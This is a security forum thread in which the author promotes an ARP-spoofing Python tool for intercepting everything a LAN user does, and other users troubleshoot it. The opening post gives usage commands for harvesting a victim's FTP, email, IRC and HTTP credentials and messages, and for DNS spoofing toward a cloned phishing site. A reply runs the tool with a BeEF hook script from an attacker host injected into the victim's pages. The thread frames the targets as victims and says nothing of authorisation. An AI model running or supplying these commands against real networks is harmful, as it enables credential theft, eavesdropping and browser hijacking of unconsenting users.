Results 1 to 13 of 13

Thread: Python tool for seeing everything a LAN user is doing

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1

    Python tool for seeing everything a LAN user is doing

    This is an open source python tool for seeing all interesting traffic from and to a client on your LAN. It's an asynchonous, multithreaded arp spoofing packet parser. It uses the Twisted framework, iptables nfqueue to feed the callback functions packets, and scapy for most packet dissection and injection.

    Simple usage:
    Code:
    git clone https://github.com/DanMcInerney/intercept
    cd intercept/
    python intercept.py -u -p -n




    -u: URLs visited; truncates at 150 characters and filters image urls since they spam the output
    -p: display username/passwords for FTP/IMAP/POP/IRC/HTTP, POSTs made, all searches made, and incoming/outgoing email and IRC messages sent
    -n: perform an doutput a very quick nmap scan of the target for open ports and operating system info

    Full usage:
    Code:
    python intercept.py -u -p -n -na -dns neopets.com -set -d -ip 10.0.1.20


    -na: perform an aggressive and complete nmap scan of the victim in the background including service enumeration. Saves results to <IP address>.nmap.txt in the working directory
    -dns DOMAIN: drop packets to DOMAIN and inject our own pointing the victim to the attack's IP address. This is especially powerful when combined with SET's web site cloning tool (option 1, 2, 3, 2, then enter the domain you're spoofing).
    -set: open the social engineer's toolkit

    Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted

    Tested on Kali 1.0. Please PM or reply with bug reports.

  2. #2
    Join Date
    2013-Nov
    Posts
    2
    wow !!! great tool !!

  3. #3
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    hi
    thanks for share!!!
    i watch the ""tutorial"" posting -up

    root@kali:~# git clone https://github.com/DanMcInerney/intercept
    Cloning into 'intercept'...
    remote: Counting objects: 306, done.
    remote: Compressing objects: 100% (206/206), done.
    remote: Total 306 (delta 105), reused 296 (delta 98)
    Receiving objects: 100% (306/306), 83.65 KiB, done.
    Resolving deltas: 100% (105/105), done.

    root@kali:~# cd intercept/
    root@kali:~/intercept# ls
    LANs.py README.md

    root@kali:~/intercept# python LANs.py
    [-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) [y/n]: y
    Traceback (most recent call last):
    File "LANs.py", line 31, in <module>
    os.system('apt-get install -y python-nfqueue')
    NameError: name 'os' is not defined

    root@kali:~/intercept# apt-get install -y python-nfqueue
    Lettura elenco dei pacchetti... Fatto
    Generazione albero delle dipendenze
    Lettura informazioni sullo stato... Fatto
    I seguenti pacchetti saranno inoltre installati:
    libnetfilter-queue1
    I seguenti pacchetti NUOVI saranno installati:
    libnetfilter-queue1 python-nfqueue
    0 aggiornati, 2 installati, 0 da rimuovere e 7 non aggiornati.
    È necessario scaricare 59,0 kB di archivi.
    Dopo quest'operazione, verranno occupati 261 kB di spazio su disco.
    Scaricamento di:1 http://http.kali.org/kali/ kali/main libnetfilter-queue1 i386 0.0.17-1 [7762 B]
    Scaricamento di:2 http://http.kali.org/kali/ kali/main python-nfqueue i386 0.4-3 [51,2 kB]
    Recuperati 59,0 kB in 1s (56,3 kB/s)
    Selezionato il pacchetto libnetfilter-queue1 non precedentemente selezionato.
    (Lettura del database... 329012 file e directory attualmente installati.)
    Estrazione di libnetfilter-queue1 (da .../libnetfilter-queue1_0.0.17-1_i386.deb)...
    Selezionato il pacchetto python-nfqueue non precedentemente selezionato.
    Estrazione di python-nfqueue (da .../python-nfqueue_0.4-3_i386.deb)...
    Configurazione di libnetfilter-queue1 (0.0.17-1)...
    Configurazione di python-nfqueue (0.4-3)...

    root@kali:~/intercept# python LANs.py
    [-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].


    one questions: worked only on wireless iface or i can use(partly) my eth0-active-connection?

    thanks in advance
    Last edited by zimmaro; 2013-11-28 at 11:40.

  4. #4
    Join Date
    2013-Jun
    Posts
    123
    I need to put LANs.py instead of intercept.py

  5. #5
    Join Date
    2013-Apr
    Posts
    1
    Nice script flyingtriangle. When i run it with beef using

    python LANs.py -u -p -n -ip 192.168.0.6 -b http://192.168.0.9:3000/hook.js

    goes fine until:

    [+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds

    [*] http://www.independent.co.uk/news/uk...s-8974102.html
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')
    IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')
    IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')


  6. #6
    Quote Originally Posted by dapirates View Post
    Nice script flyingtriangle. When i run it with beef using

    python LANs.py -u -p -n -ip 192.168.0.6 -b http://192.168.0.9:3000/hook.js

    goes fine until:

    [+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds

    [*] http://www.independent.co.uk/news/uk...s-8974102.html
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')
    IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')
    IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
    callback failure !
    Traceback (most recent call last):
    File "LANs.py", line 169, in start
    self.injecthtml(load, ack, pkt, payload, dport, sport)
    File "LANs.py", line 239, in injecthtml
    debugger = open('/home/user/projects/origBody', 'w')

    So I've done some updates. Can you please tell me if it's working now?

  7. #7
    Join Date
    2013-Dec
    Posts
    1
    Quote Originally Posted by flyingtriangle View Post
    So I've done some updates. Can you please tell me if it's working now?
    Came up from a new install of Kali, just about 3 hours ago and when using beef, it still gives me the same error

  8. #8
    Quote Originally Posted by DareDeEvil View Post
    Came up from a new install of Kali, just about 3 hours ago and when using beef, it still gives me the same error
    Whoops, that was a silly bug I uploaded. Fixed it.

  9. #9
    Join Date
    2014-Jan
    Location
    world wide
    Posts
    9
    Is there a way to scan the whole network?

  10. #10
    Join Date
    2013-Jul
    Posts
    844
    We keep getting an error when trying to install the below which is called up by the program

    apt-get install -y python-nfqueue



    Any help in finding this. We are using kali sources.list and we have truied others

  11. #11
    Join Date
    2013-Jul
    Posts
    844
    Further to our above we are unable to load apt-get install -y python-nfqueue on our updated and upgraded kali1.05 hardrive installs(three computers). However it loads on all our persistent usb installs of kali1.05.

  12. #12
    I had the same issue, I then modified the sources.list to as below and able to install python-nfqueue

    deb http://http.kali.org/kali kali main non-free contrib
    deb-src http://http.kali.org/kali kali main non-free contrib

    deb http://http.kali.org/kali kali-dev main contrib non-free
    deb-src http://http.kali.org/kali kali-dev main contrib non-free

    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

    "This is one of Vulpi's post on Kali"

  13. #13
    I am getting an error
    root@kali:~/intercept# python LANs.py -u -p -n[*] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.239.0/24]
    [-] Router MAC not found. Exiting.

    What am I doing wrong? My adapter is in mono mode and I have connected to my network via wlan0

    It would appear I have found the solution to some extent - I had been running reaver prior to running this script and had
    killed some of the services - after a reboot the script ran but although I am connected to my own network via a VM it does not
    show my computer name after the scan - all I get is three ip's one of which is the router with nothing else showing for the other
    3 ip's, is this normal?

    Rab.
    Last edited by flyinghaggis; 2014-02-12 at 21:21. Reason: Status Update

Similar Threads

  1. Replies: 0
    Last Post: 2022-12-21, 09:32
  2. Replies: 0
    Last Post: 2021-03-23, 12:33
  3. create new user (user) as copy from existing user (root)
    By D0NKbet in forum General Archive
    Replies: 2
    Last Post: 2013-11-21, 07:24

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •